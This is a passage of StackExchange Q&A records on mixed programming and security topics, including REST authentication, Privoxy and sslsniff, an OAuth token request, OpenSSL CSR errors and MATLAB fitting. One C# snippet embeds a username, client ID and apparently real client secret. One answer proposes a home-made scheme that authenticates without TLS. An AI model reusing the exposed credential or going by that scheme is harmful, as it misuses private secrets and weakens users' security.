There are several well-established **and extensively tested** methods for REST authentication.\nAnswer: The following links may provide you with an in-depth answer:\n\nREST security standards\nI just send username and password over https. Is this ok?\nhttps:\/\/stackoverflow.com\/questions\/3461298\/password-hashing-non-ssl\n\nPlease keep in mind that it is better to not use the username-password combination in every request that you make. Better is to authenticate the user, generate a token server-side, communicate it to the client (e.g. in a cookie) and use that token as authentication for subsequent requests. This link can guide you in that process: https:\/\/github.com\/OWASP\/CheatSheetSeries\/blob\/master\/cheatsheets\/Session_Management_Cheat_Sheet.md. \nAnswer: If you only need to provide authentication but the data transmitted over the wire is not sensitive then there is a better way without the overhead\/latency of SSL.\nSay you have a mobile client app; first make the user sign up or register by providing their email(username) and password in a separate web form (not part of the app or REST service). Then upon successful registration you respond with a user key (this can be a shared secret key stored in the user account on the server (database) for symmetric encryption or a public key for asymmetric encryption where the corresponding private key is stored in the user account on the server (database). This is all done using a web form over SSL.\nNow when the user opens the client app you must ask them for their credentials which will be sent with every request to the RESTful service. They must provide their name, password and encryption key which they received previously. This need only be done once. The app then provides some http header with each request which looks something like this:\nAUTHENTICATE> username:timestamp:encrypted{password:timestamp} \/AUTHENTICATE>\nNote that both the password and timestamp inside the {} is encrypted using the user's key. The timestamp is updated with every single request.\nImplement an authentication filter on the server that does the following:\nFirst check the timestamp and if expired (say older than 1 second) send an UNAUTHORIZED HTTP response code. If the timestamp is valid lookup the username in your user account database. If not found send an UNAUTHORIZED HTTP response. If the username is found, fetch the stored encryption key for that user (remember this can be a shared secret key or the private key for the users public key). Decrypt the encrypted {password:timestamp}. The decryted password must match the users password stored in your database (the password itself could also be encryted in the database using another key for added security) and the decrypted timestamp must also match the non encrypted timestamp sent in the AUTHENTICATE header above. If not then send an UNAUTHORIZED HTTP response code. 
If successful the request has been authenticated without the use of cookies\/sessions.\nYou can also cache the the user details to avoid doing a database lookup with every request.\nNow if someone is snooping and intercepts the request they will not be able to re-use it to gain access because either the timestamp will be invalid or ,if they update the unencrypted timestamp to be valid, it will not match the encrypted timestamp (after the authentication filter decrypts it).\nAnother advantage of this approach over using a single app key is that you now have complete control over who can access your service by putting an expiry date on the user account in the database (effectively implementing a subscription based service). This is great because at first you may want to get as many users as possible with a trial subscription (free for say 1 year) then later block access to that user if they haven't payed up to extend the account expiry date :)\n","meta":{"source":"security.stackexchange","title":"Securing passwords for REST Authentication","dup_signals":{}},"subset":"stackexchange"} +{"text":"Path to JQuery library in \n\nQuestion: I downloaded jquery library and added it to WebContent\/js folder in Spring MVC project. In my jsp file i have a line\n but when i try to use jquery functions, it doesnt work. When i replace source path to \"http:\/\/code.jquery.com\/jquery-latest.js\" it works fine. Jsp files are located in \"WebContent\/WEB-INF\/jsp\" folder. What is the correct path to jquery library? \nComment: So you have a bad path to that folder. what is the question?!\nAnswer: Check out this answer. Basically you need to use the <code><c:url \/><\/code> tag to generate the correct relative path to your script.\nIn your case, you'll want to use:\n<code><script src=\"<c:url value='\/js\/jquery.js' \/>\"><\/script>\n<\/code>\n","meta":{"source":"stackoverflow","title":"Path to JQuery library in","dup_signals":{}},"subset":"stackexchange"} +{"text":"Are there any strange things with google.com over HTTPS?\n\nQuestion: So I'm always browsing the web through Privoxy using minimum these rules: \n<code>vi \/etc\/privoxy\/user.action\n\n{ +redirect{s@http:\/\/@https:\/\/@} }\n.chrome.google.com\n.code.google.com\n.docs.google.com\n.encrypted.google.com\n.googlecode.com\n.googlelabs.com\n.mail.google.com\n\n# google calendar\n{ +redirect{s@http:\/\/www.google.com\/calendar\/@https:\/\/www.google.com\/calendar\/@} }\n.google.com\n\n# google notebook\n{ +redirect{s@http:\/\/www.google.com\/notebook\/@https:\/\/www.google.com\/notebook\/@} }\n.google.com\n<\/code>\nThis is working great, in short it ensures that if I visit e.x.: a Google Notebook page, it's always using encryption. So if I forget to type \"HTTPS\" and I type \"HTTP\" to a Google notebook URL it redirects me to the HTTPS version of Google Notebook.\nBut... a strange thing happened a few weeks ago several times: when I used the Privoxy I just couldn't reach Gmail.com, or Google Notebook, etc. If I configured Firefox to not use Privoxy I could reach Google Notebook pages, or Gmail, etc.\nThe error message when I used Privoxy was [from the webbrowser]: \"connection timed out\". 
[I tried to restart Privoxy, restart the machine, and I tried it on other machines with different OS, at different places\/ISP's]\nso the Q: Could that be that I was attacked or there were any problems with Google Notebook, Gmail over CLEANLY* HTTPS?\n*CLEANLY means that CLEANLY over HTTPS [redirecting all http:\/\/mail.google.com requests to .\nI'm using Privoxy because it could defend me from sslsniff like attacks [FIXME] -> so that HTTPS connections could get degraded to HTTP.\nAnswer: I don't think this is the appropriate forum to ask for help debugging your privoxy rules; asking on the privoxy mailing lists might get you better answers. That said, I do have some advice for you:\nMy recommendation: I believe that there's a better way to achieve your goals. Instead of trying to write your own custom Privoxy rules, I recommend that you use HTTPS Everywhere.\nBy way of background, HTTPS Everywhere is a browser extension for Firefox. Whenever you visit a web site that supports HTTPS (and that HTTPS Everywhere is familiar with), the extension will redirect you to use the HTTPS version of the web site. Others have built up an extensive database that HTTPS Everywhere uses to get you HTTPS protection whereever possible, without breaking your web browsing experience.\nWhy use HTTPS Everywhere? Let me justify my recommendation of HTTPS Everywhere:\n\nAs a reminder, earlier this year you asked about using privoxy for these purposes, and I warned that the privoxy approach may be fragile and it would be better to use HTTPS Everywhere, if possible. The reason is that HTTPS Everywhere is well-tested and designed for exactly this purpose, and incorporates a whitelist that understands when it is safe to perform the HTTP->HTTPS conversion, and reflects the idiosyncracies of various sites. If you want to write your own Privoxy rules, then you will have to duplicate all that research on your own, and you should not be surprised if things frequently break for you. \nIf that doesn't convince you, I'll also remind you that earlier this year you asked about why your privoxy approach broke downloading Firefox add-ons, and people here gave you a nice explanation of why your privoxy rules weren't quite right and recommended using HTTPS Everywhere instead. If you continue using Privoxy rules, I think you should be prepared that web sites may occasionally break for mysterious and tricky-to-debug reasons.\nAnswer: \nCould that be that I was attacked or there were any problems with Google Notebook, Gmail over CLEANLY* HTTPS?\n\nI don't think you've been attacked using \"sslsniff\" alike approaches. If, you would most probably haven't noticed it.\nThe \"connection timed out\" give a pretty good indication that there was either a slow network or a general network problem.\nI am not aware about problems at the Google services you noted, but you have to remember that you don't just dial-in to Google itself... your connection hops several network connections. This means that it only takes one of the servers along the way to be out-of-order for a short time and you'll notice \"connection timed out\" messages. 
\nBesides, such a message can point to attacks, but most of the time they don't.\n\nI'm using Privoxy because it could defend me from sslsniff like attacks [FIXME] -> so that HTTPS connections could get degraded to HTTP.\n\nYou forgot about the fact that \"sslsniff\" uses MITM-alike (Man In The Middle) attacks, which works in a way that neither endpoint of the connection actually notices that the connection is degraded.\nSince Privocy (being nothing more than a filtering proxy) runs on your local machine, it will only get the same information your machine generally gets... Privoxy has no way of detecting if the connection has been tampered with in most cases of \"sslsniff attacks, since you - being one of the two endpoints - receive information that makes your computer thing the connection is still a secure HTTPS connection.\nThat is - what makes \"sslsniff\" such an often-discussed toolset. It shows that there are security problems that HTTPS actually shouldn't have.\nmy opinion\nAll in all, I think you've created a nice set of rules for Privoxy which help you to surf as you like. But I also think you are expecting a bit too much security from a non-caching filtering proxy you're running on your local machine.\nPrivoxy was never build to be a security tool to protect and secure HTTPS connections. Privoxy was and still is a filtering proxy which was initially made to filtered stuff like advertising... not something that will make sure your https connection is secure. \nAs a reminder, here's the description from the privoxy website itself:\n\nPrivoxy is a non-caching web proxy with advanced filtering capabilities for enhancing privacy, modifying web page data and HTTP headers, controlling access, and removing ads and other obnoxious Internet junk. \n\nMy 2 cents: you can't expect such a tool to do a job it was never build for. Remember: we're talking network security here, not advertising banners and killing links to malware and phishing websites! \nUPDATE\nIn fact, when talking about \"sslsniff\" or even \"sslstrip\" (which won't cause ssl errors when in effect), it's known that even tools like \"HTTPS Everywhere\" fail. \nI saw someone answered that \"HTTPS Everywhere\" would be the perfect choice. And yes, it is indeed a \"better choice than Privoxy\". Note though that even \"HTTPS Everywhere\" won't protect you from every kind of HTTPS attack. \nFor details on \"sslsniff\", \"sslstrip\" and the \"HTTPS Everywhere\" limitations related to it, you might want to check Does HTTPS Everywhere defend me against sslsniff-like attacks? \nBut \"HTTPS Everywhere\" is definitely a better choice than relying on Privoxy.\n","meta":{"source":"security.stackexchange","title":"Are there any strange things with google.com over HTTPS?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Criminals using my IP when I use a VPN\n\nQuestion: Is it possible for my IP address to be used by other parties when I use a VPN? 
My friend says that someone who is computer smart can use it for illegal activities, so it\u00b4s traced back to me.\nComment: Please specify whether you're talking about VPN *services*, offered for free or for charge by various organizations, or VPN *tunnels*, which are the underlying mechanism by which they work and may be public, leased, or private.\nAnswer: Even when you use a \"VPN done right\" which makes all activity originate from the external IP of the VPN provider, you might still trigger a false positive and get wrongly accused for what another VPN user did.\n\nVPN User A has an account on example.com. A is a perfect model citizen of the example.com community.\nThen VPN User B also creates an account on example.com, and proceeds to break every written and unwritten rule of the website.\nThe admin of example.com intervenes. They check the IP of User B and see that A and B both have the same IP address. They therefor believe that A and B are the same person and both accounts get banned.\n\nWhen the admin of the website notices that the IP is a VPN exit point and they are reasonable, they might revoke the ban for A. But they might not notice that unless contacted. That appeal process will still be inconvenient for A.\nI've also seen websites which experienced increased abuse over VPNs and overreacted by assuming that nobody would use a VPN unless they have nefarious intentions (after all, if you have nothing to hide...) and decided to proactively ban all users who use VPNs.\nComment: Great answer! One question comes to mind though: how can you tell whether or not a person is connected through a VPN? Do websites maintain a list of known IP addresses for VPN providers? How would they keep that list updated?\nComment: @Vinayak not only are such lists maintained by various groups (most charge for an aggregation like service), it's not overly difficult for some site admins to _home brew_ their own via [`dig`](https:\/\/www.cyberciti.biz\/faq\/linux-unix-dig-command-examples-usage-syntax\/) and [`whois`\/`host`](https:\/\/www.cyberciti.biz\/faq\/linux-unix-command-to-find-who-owns-domainname\/) command line tools. Though _difficulty_ being somewhat relative, and specific tools may vary; _`dig`-n-such_ just being some that are easily installed, and only part of a larger intrusion monitoring\/prevention system.\nAnswer: If the whole VPN thing is done right, then there is no such risk for you. \nHowever, there are \"community powered\" VPN providers that route other peoples traffic through your system, and one example is Hola:\n\nHola built a peer-to-peer overlay network for HTTP, which securely routes the sites you choose through other Hola users' devices and not through expensive servers.\n\nYou don't want to use a service that uses your bandwidth and potentially gets you in trouble. \nBottomline: If you want a VPN, pay for it. There is no such thing as free bandwidth.\nComment: by definition of done right I assume you mean that you don't share the VPN with others?\nComment: @silverpenguin I would consider setting up your own VPN server \"done right\".\nComment: As described, Hola sounds a lot like [Tor](https:\/\/en.wikipedia.org\/wiki\/Tor_(anonymity_network)).\n","meta":{"source":"security.stackexchange","title":"Criminals using my IP when I use a VPN","dup_signals":{}},"subset":"stackexchange"} +{"text":"Sync Contacts From Azure AD or MS O365 to phone book\n\nQuestion: Every user account has such information as username, email, phone number. 
I can find these information via AzureAD, MS O365, Exchange Online, MS Teams etc.\nIs there any possible way to sync these information with users' contact\/phone books on their mobile devices?\nSo in the result every employee should see all his co-workers in his phonebook.\nAnswer: If users add the organizational mail account (Office 365) on their phone they can simply search for their co-workers. Initial search results will be as found on the phone. After that they will see results from the organizational directory address book.\nIf you need your users to have the information available as local contacts on their phones, you can instruct your users to follow the guidance at https:\/\/support.microsoft.com\/en-us\/office\/outlook-for-ios-and-android-faq-65a01e26-e3c2-4067-bd05-0db6220e5c34 in section \"How do I save my Outlook contacts to the default Contacts app on iOS and Android?\".\nComment: I found that i can sync all contacts from Outlook app to the phone-book the only issue is, Is there any easy and fast way to add all users into contacts folder?\n","meta":{"source":"stackoverflow","title":"Sync Contacts From Azure AD or MS O365 to phone book","dup_signals":{}},"subset":"stackexchange"} +{"text":"Spring-Data\/MongoDB\/QueryDSL Searching nested _id of ObjectId type\n\nQuestion: When an document from a collection is nested inside a document of another collection, it's pretty standard to make a copy of the nested document verbatim instead of creating another type of document just for the sake of nesting. Ex:\n<code>category {\"_id\": ObjectId(\"c1\"), \"name\": \"Category 1\"}\nquestion {\"_id\": ObjectId(\"q1\"), category: {\"_id\": ObjectId(\"c1\"), \"name\": \"Category 1\"}}\n<\/code>\nWhen using queryDSL as follows:\n<code>question.category.id = \"c1\"\n<\/code>\nqueryDSL generates a query like this:\n<code>\"question.category._id\":\"c1\"\n<\/code>\nwhere I expect:\n<code>\"question.category._id\":ObjectId(\"c1\")\n<\/code>\nThis works for top level documents, not for nested. I think this is a valid case and Spring should do the same translations it does for top level search. Is there a workaround for that?\nAnswer: QueryDSL will not convert String to ObjecetId on the fly since it is not aware of Spring Data annotations like <code>@Id<\/code> or <code>@Field(targetType = FieldType.OBJECT_ID)<\/code>. Therefore, it will look only at Java type of your field. I found this workaround to keep String Id but been able to compare with ObjectId. Taking your code as a reference I can give you this snippet:\n<code>Path<ObjectId> categoryIdPath = Expressions\n .path(ObjectId.class, qQuestion.category.id.getMetadata());\n\nPredicate predicate = Expressions.predicate(Ops.EQ, categoryIdPath,\n Expressions.constant(new ObjectId(\"c1\"))));\n<\/code>\n","meta":{"source":"stackoverflow","title":"Spring-Data\/MongoDB\/QueryDSL Searching nested _id of ObjectId type","dup_signals":{}},"subset":"stackexchange"} +{"text":"how to graph error in parameters from polynomial fit - MATLAB\n\nQuestion: I have a list of data that I am trying to fit to a polynomial and I am trying to plot the 95% confidence bands for the parameters as well (in Matlab).\nIf my data are x and y\n<code>f=fit(x,y,'poly2')\nplot(f,x,y)\nci=confint(f,0.95);\na_ci=ci(1,:);\nb_ci=ci(2,:);\n<\/code>\nI do not know how to proceed after that to get the minimum and maximum band around my data. Does anyone know how to do that? 
\nAnswer: I can see that you have the curve fitting toolbox installed, which is good, because you need it for the following code to work.\nBasic fit of example data\nLet's define some example data and a possible fit function. (I could also have used <code>poly2<\/code> here, but I wanted to keep it a bit more general.)\n<code>xdata = (0:0.1:1)'; % column vector!\nnoise = 0.1*randn(size(xdata));\nydata = xdata.^2 + noise;\nf = fittype('a*x.^2 + b'); \nfit1 = fit(xdata, ydata, f, 'StartPoint', [1,1])\nplot(fit1, xdata, ydata)\n<\/code>\nSide note: <code>plot()<\/code> is not our usual plot function, but a method of the cfit-object fit1.\n\nConfidence intervals of the fitted parameters\nOur fit uses the data to determine the coefficients <code>a<\/code>,<code>b<\/code> of the underlying model <code>f(x)=ax2+b<\/code>. You already did this, but for completeness here is how you can read out the uncertainty of the coefficients for any confidence interval. The coefficients are alphabetically ordered, which is why I can use <code>ci(1,:)<\/code> for <code>a<\/code>, and so on.\n<code>names = coeffnames(fit1) % check the coefficient order!\nci = confint(fit1, 0.95); % 2 sigma interval\na_ci = ci(1,:)\nb_ci = ci(2,:)\n<\/code>\nBy default, Matlab uses 2\u03c3 (0.95) confidence intervals. Some people (physicists) prefer to quote the 1\u03c3 (0.68) intervals.\nConfidence and Prediction Bands\nIt's a good habit to plot confidence bands or prediction bands around the data \u2013 especially when the coefficients are correlated! But you should take a moment to think about which one of the two you want to plot:\n\nPrediction band: If I take a new measurement value, where would I expect it to lie? In Matlab terms, this is called the \"observation band\".\nConfidence band: Where do I expect the true value to lie? In Matlab terms, this is called the \"functional band\".\n\nAs with the coefficient's confidence intervals, Matlab uses 2\u03c3 bands by default, and the physicists among us switch this to 1\u03c3 intervals. By its nature, the prediction band is bigger, because it is the combination of the error of the model (the confidence band!) and the error of the measurement.\nThere is a another destinction to make, one that I don't fully understand. Both Matlab and Wikipedia make that distinction.\n\nPointwise: How big is the prediction\/confidence band for a single measurement\/true value? In virtually all cases I can think of, this is what you would want to ask as a physicist.\nSimultaneous: How big do you have to make the prediction\/confidence band if you want a set of all new measurements\/all prediction points to lie within the band with a given confidence?\n\nIn my personal opinion, the \"simultaneous band\" is not a band! For a measurement with n points, it should be n individual error bars!\nThe prediction\/confidence distinction and the pointwise\/simultaneous distinction give you a total of four options for \"the\" band around the plot. Matlab makes the 2\u03c3 pointwise prediction band easily accessible, but what you seem to be interested in is the 2\u03c3 pointwise confidence band. It is a bit more cumbersome to plot, because you have to specify dummy data over which to evaluate the prediction band:\n<code>x_dummy = linspace(min(xdata), max(xdata), 100);\nfigure(1); clf(1);\nhold all\nplot(xdata,ydata,'.')\nplot(fit1) % by default, evaluates the fit over the currnet XLim\n% use \"functional\" (confidence!) 
band; use \"simultaneous\"=off\nconf1 = predint(fit1,x_dummy,0.95,'functional','off');\nplot(x_dummy, conf1, 'r--')\nhold off\n<\/code>\n\nNote that the confidence band at <code>x=0<\/code> equals the confidence interval of the fit-coefficient <code>b<\/code>!\nExtrapolation\nIf you want to extrapolate to x-values that are not covered by the range of your data, you can evaluate the fit and the prediction\/confidence band for a bigger range:\n<code>x_range = [0, 2];\nx_dummy = linspace(x_range(1), x_range(2), 100);\nfigure(1); clf(1);\nhold all\nplot(xdata,ydata,'.')\nxlim(x_range)\nplot(fit1)\nconf1 = predint(fit1,x_dummy,0.68,'functional','off');\nplot(x_dummy, conf1, 'r--')\nhold off\n<\/code>\n","meta":{"source":"stackoverflow","title":"how to graph error in parameters from polynomial fit - MATLAB","dup_signals":{}},"subset":"stackexchange"} +{"text":"When has the Tory party split over trade issues?\n\nQuestion: Today in a leaked UK Government memo it says the UK Tory Party has split 4 times in last 200 years over global trade. When were these 4 splits and over what?\nHere is the Reuters link to the memo itself.\nI can definitely think of one split over trade, the Corn Laws. I was wondering what the other 3 were. I suppose today's Tory party is split over the EU so that must be a second. Anyone else got the other two?\nAnswer: One case in point is the Tariff Reform League of Joe Chamberlain:\n\nTariff Reform split the MPs of the Conservative Party and their\n government coalition allies in the Liberal Unionist Party and was the\n major factor in its landslide defeat in 1906 to the Liberals who\n advocated Free Trade.\n","meta":{"source":"history.stackexchange","title":"When has the Tory party split over trade issues?","dup_signals":{}},"subset":"stackexchange"} +{"text":"JQuery, cytoscape.js - How to queue two different loops containing cytoscape animations?\n\nQuestion: I would like to execute one loop (1.), wait until animations from that loop end, then execute second loop with animations (2.). 
Can somebody tell me how to do it in an optimal way in this particular case?\n<code>cy.on(\"tap\", \".story_node\", function () {\n var node = this;\n\n var crudObjects = [\n {\n node: { group: \"nodes\", data: { id: \"edit\", content: \"Edytuj\" }, position: { x: node.position(\"x\"), y: node.position(\"y\") }, classes: \"crud\" },\n edge: { group: \"edges\", data: { source: node.id(), target: \"edit\" }, classes: \"crud_edge\" },\n targetPos: { x: node.position(\"x\") + 150, y: node.position(\"y\") - 75 }\n },\n {\n node: { group: \"nodes\", data: { id: \"create\", content: \"Dodaj\" }, position: { x: node.position(\"x\"), y: node.position(\"y\") }, classes: \"crud\" },\n edge: { group: \"edges\", data: { source: node.id(), target: \"create\" }, classes: \"crud_edge\" },\n targetPos: { x: node.position(\"x\") + 200, y: node.position(\"y\") }\n },\n {\n node: { group: \"nodes\", data: { id: \"delete\", content: \"Usu\u0144\" }, position: { x: node.position(\"x\"), y: node.position(\"y\") }, classes: \"crud\" },\n edge: { group: \"edges\", data: { source: node.id(), target: \"delete\" }, classes: \"crud_edge\" },\n targetPos: { x: node.position(\"x\") + 150, y: node.position(\"y\") + 75 }\n }\n ];\n\n \/\/ (1.)\n var areCrudNodesAdded = cy.$(\".crud\").length > 0;\n var source = cy.$(\".crud\").predecessors().sources().first();\n var delay = 0;\n var duration = 250;\n if (areCrudNodesAdded) {\n var crudNodes = cy.$(\".crud\");\n for (var i = 0; i < crudNodes.length; i++) {\n var currNode = crudNodes[i];\n (function (currNode) {\n currNode.delay(delay).animate({\n position: source.position(),\n css: {\n \"width\": 10,\n \"height\": 10,\n \"border-width\": 0,\n \"opacity\": 0\n }\n }, {\n duration: duration,\n complete: function () {\n currNode.remove();\n }\n });\n\n delay += duration;\n })(currNode);\n }\n }\n\n \/\/ (2.)\n if (!areCrudNodesAdded || source !== this) {\n source = this;\n $.each(crudObjects, function (idx, crud) {\n var crudNode = cy.add(crud.node);\n cy.add(crud.edge);\n\n crudNode.css({\n \"width\": 10,\n \"height\": 10,\n \"border-width\": 0,\n \"opacity\": 0\n }).delay(delay).animate({\n position: crud.targetPos,\n css: {\n \"width\": 80,\n \"height\": 80,\n \"border-width\": 2,\n \"opacity\": 1\n }\n }, {\n duration: duration,\n complete: function () {\n crudNode.removeCss();\n }\n });\n\n delay += duration;\n });\n }\n}); \/\/ on tap\n<\/code>\nAnswer: Create animations via <code>cy.animation()<\/code> and <code>ele.animation()<\/code>.\n<code>ele.animation().promise()<\/code> gives a promise that you can use for chaining.\n","meta":{"source":"stackoverflow","title":"JQuery, cytoscape.js - How to queue two different loops containing cytoscape animations?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to reuse access Token for Get method? 
I want to make a call to a extended URL to receive data\n\nQuestion: I have the following code which gives me a Access token, now that I have finally been able to access a token I realized this token will expire, so what can I do to keep refreshing the token, and use it to grab vaules in my get method\nPostman Image (the data I want) : \nValuesController.Cs \n<code>namespace APICredential.Controllers\n{\n [RoutePrefix(\"api\")]\n public class ValuesController : ApiController\n {\n [HttpGet, Route(\"values\")]\n public async Task<string> Post()\n {\n using (HttpClient client = new HttpClient())\n {\n client.BaseAddress = new Uri(\"https:\/\/api.elliemae.com\/oauth2\/\");\n\n var parameters = new Dictionary<string, string>()\n {\n {\"grant_type\", \"password\"}, \/\/Gran_type Identified here\n {\"username\", \"admin@encompass:BE11200822\"},\n {\"password\", \"Shm******\"},\n {\"client_id\", \"gpq4sdh\"},\n {\"client_secret\", \"dcZ42Ps0lyU0XRgpDyg0yXxxXVm9@A5Z4ICK3NUN&DgzR7G2tCOW6VC#HVoZPBwU\"},\n {\"scope\", \"lp\"}\n };\n\n HttpRequestMessage request = new HttpRequestMessage(HttpMethod.Post, \"v1\/token\")\n\n {\n Content = new FormUrlEncodedContent(parameters)\n };\n\n HttpResponseMessage response = await client.SendAsync(request);\n\n string result = await response.Content.ReadAsStringAsync();\n\n return result;\n }\n }\n\n[HttpGet, Route(\"values\/{id}\")]\npublic string Get(int id)\n{\n return \"\";\n\n}\n<\/code>\nComment: accesstoken is already in place that's giving people the visual to let them know where I am currently\nComment: if your token expired...... just get a new one (like you just got the first one), you can increase the expiration time if that helps\nComment: Well how do I use this access token on a GET method, I want to extend a retrieve data through my access token\nComment: Your question doesn't fit will with the code you've shown so it's hard to answer. Maybe this info would help you make your question more clear. https:\/\/learn.microsoft.com\/en-us\/aspnet\/web-api\/overview\/security\/external-authentication-services\nAnswer: Refresh token functionality is not implemented in the API (https:\/\/api.elliemae.com\/oauth2\/v1\/token).\nif had supported, you would get the refresh_token along access_token, by using refresh_token you could update your access_token after its expiry. This is what OAuth 2.0 says.\n","meta":{"source":"stackoverflow","title":"How to reuse access Token for Get method? I want to make a call to a extended URL to receive data","dup_signals":{}},"subset":"stackexchange"} +{"text":"Error while creating a CSR\n\nQuestion: During the creation of self-signed certificate using OpenSSL command line tool, i'm encountered with an error \nFirst I created a private key\n<code>openssl genrsa -out MyKey1.key 2048<\/code>\nWhile creating a CSR i'm getting an error\n<code>openssl req -new -out MyCert1.req -key MyKey1.key -subj \/CN=Description of the Server<\/code>\nError is\n<code>problem creating object tsa-policy1=18.104.22.168.1<\/code>\n<code>5364:error:08064066:object identifier routines:OBJ_create:pid exists:crypto\\objects\\obj_dat.c:689:<\/code>\nIs there something i'm missing here ?\nComment: What version do you use? The error is interesting since it does not have much to do with ts module. Seems like it read the value from `openssl.cnf` but I don't see why. By the way, dont you miss quotation marks here: `-subj \"\/CN=Description of the Server\"`?\nComment: The Version is 1.0.1 Lite. 
I did have the quotation, missed it while adding it here.\nAnswer: \nClose the current cmd window and open new cmd window.\nContinue from the second \"req\" step.\nComment: worked for me. I think this is a big bug which should be solved by the developing team.\nAnswer: I had this same problem while creating a self signed certificate...\nsetting these two environment variables fixed it!\n<code>set RANDFILE=c:\\demo\\.rnd\nset OPENSSL_CONF=C:\\OpenSSL-Win32\\bin\\openssl.cfg\n<\/code>\nI found the solution in this blog post\nAnswer: I had the same issue when creating client certificate request on Windows platform. Run application as Administrator solves the problem.\nAnswer: In my situation, I changed the administrator password while I was working so CMD lost the privileges. I closed the current CMD window and opened again\nComment: Welcome to Stack Overflow and thank you for your attempted answer. However, it should be noted that your answer is pretty much a duplicate of the top voted answer. The *reason* why yours failed may be different (which could warrant a *comment* when you have enough rep), but the step you took to resolve it is exactly the same as noted in the top-voted-answer.\nAnswer: Look into the openssl.cnf file for this section:\n<code># Policies used by the TSA examples.\n\ntsa_policy1 = 188.8.131.52.1\ntsa_policy2 = 184.108.40.206.5.6\ntsa_policy3 = 22.214.171.124.5.7\n<\/code>\nComment or remove the tsa_policyX lines, save the configuration file and launch the command again.\n","meta":{"source":"stackoverflow","title":"Error while creating a CSR","dup_signals":{}},"subset":"stackexchange"} +{"text":"scanning files into nested structures\n\nQuestion: So I have tried looking for something similar to my situation but I cant find anything that helps or that is simple enough for me to understand. \nMy issue I am sure is not difficult, but I do not know how to do the following:\nI have a structure within a structure and need to scan in multiple files into the main structure.\nThis is what I have and the point where I am stuck is in messages. I feel as though I may need one more structure, but again I am not sure \nthese are my structures\n<code> typedef struct {\nint year;\nint month;\nint day;\nchar time[9];\n } datetime_t\n\n typedef struct\n {\ndatetime_t datetime;\ndouble latitude;\ndouble longitude;\ndouble magnitude;\ndouble depth;\nchar location[LOCATION]\n } data_t\n<\/code>\nhere is my scanning file\n<code> void scan_data(data_t Alaska[], data_t Central[],data_t Inner[],\n data_t East[],data_t West[],data_t Canada[MAX_INFO])\n {\nint i=0; \nFILE *FAlaska;\nFILE *FCentral;\nFILE *FInner;\nFILE *FEast;\nFILE *FWest;\nFILE *FCanada;\n\nFAlaska = fopen(\"Alaska.txt\", \"r\");\nFCentral = fopen(\"Central.txt\", \"r\");\nFInner = fopen(\"InnerMountain.txt\", \"r\");\nFEast = fopen(\"NorthEast.txt\", \"r\");\nFWest = fopen(\"NorthWest.txt\", \"r\");\nFCanada = fopen(\"NorthernCanada.txt\", \"r\");\n\nwhile (i < MAX_DATA && \n fscanf(FAlaska, \"%s\", data[i].datetime) !=EOF) \/*here is my issue*\/\n{ \n fscanf(FAlaska, \"d\", data.latitude);\n}\nfclose(FAlaska);\nreturn;\n }\n<\/code>\nI am not sure how or if I can scan data into a structure within a structure?\nDo you do data[I].datetime.year?\nor scan into datetime as a separate array\/struct and then assign it later to the bigger struct?\nany help would be much appreciated on how to do this. Thank You. 
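As a rough sketch of the direct approach (reading straight into the nested members), assuming each line of the input file holds the date, the time and the numeric fields separated by whitespace; the column order, the file name and the LOCATION and MAX_DATA values below are illustrative guesses, not taken from the actual data files:
<code>#include <stdio.h>

#define LOCATION 64   /* assumed size, not given in the question */
#define MAX_DATA 100  /* assumed row limit */

typedef struct {
    int year;
    int month;
    int day;
    char time[9];
} datetime_t;

typedef struct {
    datetime_t datetime;
    double latitude;
    double longitude;
    double magnitude;
    double depth;
    char location[LOCATION];
} data_t;

/* Reads one region file into the given array and returns the number of rows read. */
static int read_region(const char *path, data_t data[], int max_rows)
{
    FILE *fp = fopen(path, "r");
    if (fp == NULL) {
        return 0; /* could not open the file */
    }

    int n = 0;
    /* Assumed line layout: year month day time latitude longitude magnitude depth location */
    while (n < max_rows &&
           fscanf(fp, "%d %d %d %8s %lf %lf %lf %lf %63s",
                  &data[n].datetime.year,   /* nested members can be scanned into directly */
                  &data[n].datetime.month,
                  &data[n].datetime.day,
                  data[n].datetime.time,
                  &data[n].latitude,
                  &data[n].longitude,
                  &data[n].magnitude,
                  &data[n].depth,
                  data[n].location) == 9) {
        n++;
    }

    fclose(fp);
    return n;
}

int main(void)
{
    data_t alaska[MAX_DATA];
    int count = read_region("Alaska.txt", alaska, MAX_DATA);
    printf("Read %d records\n", count);
    return 0;
}
<\/code>
Note that %63s stops at the first whitespace, so a location field containing spaces would need a scanset conversion instead.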
\nComment: You ask [`fscanf`](http:\/\/en.cppreference.com\/w\/c\/io\/fscanf) to read a string, and write it to a structure, you can't do that. First of all, when `scanf` (and family) reads a string it reads a *space delimited* string, so if the string you want to read contains spaces it will not read all. Secondly, you need to read each field of the nested structure separately, if it's in the file that way.\nComment: Perhaps http:\/\/stackoverflow.com\/questions\/2722606\/how-to-parse-a-string-into-a-datetime-struct-in-c or http:\/\/stackoverflow.com\/questions\/12071342\/reading-a-date-with-sscanf will be of some help. Duplicates?\nComment: @JoachimPileborg I see your point, Ill work on this.\nAnswer: \nI am not sure how or if I can scan data into a structure within a\n structure? Do you do data[I].datetime.year?\n\nYes, we do. For example, if your date\/time format is \"YYYY-MM-DD hh:mm:ss\", you can use\n<code>data = Alaska;\n\u2026\n fscanf(FAlaska, \"%d-%d-%d %8s\", &data[i].datetime.year,\n &data[i].datetime.month,\n &data[i].datetime.day, data[i].datetime.time) \u2026\n<\/code>\n","meta":{"source":"stackoverflow","title":"scanning files into nested structures","dup_signals":{}},"subset":"stackexchange"} +{"text":"Delete files which are older than today's date\n\nQuestion: I have some files in the format of \"yyyyMMdd_hhmmss_abc.txt\" in a particular location.\nusing the below code i am able to get all the files with \"_abc.txt\" in that folder. \n<code>fileArray = Directory.GetFiles(@\"C:\/\/Documents\", \"*abc.txt\");\nfor (int i = 0; i < fileArray.Length; i++)\n{\n fileArray[i] = Path.GetFileNameWithoutExtension(fileArray[i]);\n Console.WriteLine(fileArray[i]);\n}\n<\/code>\nBut now I'm thinking of reading the file name, split it and then convert into date time object so that i can check for the condition(older than today's date) and delete them. \n\n<code>for eg: 20160426_045823_abc.txt\n<\/code>\n\nI want to split it into 2016, 04 , 26 and then convert into date time object using \n<code>Datetime d1 = new Datetime(2016,04,26)<\/code> and then do other operations. \nIs there any other way to solve this problem?\nThanks in advance \nComment: Possible duplicate of [Removing files that are older than some number of days](http:\/\/stackoverflow.com\/questions\/1720790\/removing-files-that-are-older-than-some-number-of-days)\nComment: @KenWhite It's not a duplicate. 
